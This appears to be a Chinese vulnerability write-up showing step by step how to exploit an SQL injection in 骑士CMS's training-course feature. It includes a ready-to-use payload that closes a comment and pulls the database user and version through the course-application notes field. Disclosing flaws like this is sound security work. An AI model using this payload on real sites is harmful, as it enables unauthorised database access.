骑士CMS某新功能SQL注入

  • A+
所属分类:漏洞时代
摘要

培训中心SQL注入。所以先注册一个培训中心的账号,然后去发不新课程,课程名用:cname’/*, 其他的随便填写。

培训中心SQL注入。所以先注册一个培训中心的账号,然后去发不新课程,

课程名用:cname'/*, 其他的随便填写。

骑士CMS某新功能SQL注入

然后使用用户的身份登录其申请课程:

骑士CMS某新功能SQL注入

随便填写:

骑士CMS某新功能SQL注入

提交即返回错误:

骑士CMS某新功能SQL注入

我们把其他说明改为:

code 区域
*/,3,1, 200, concat(user(),0x0a,version()) , 1, 1413525884)#

然后提交即成功。

这个时候用培训中心的账号,查看课程申请:

骑士CMS某新功能SQL注入

可以看到数据已经出来了。

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: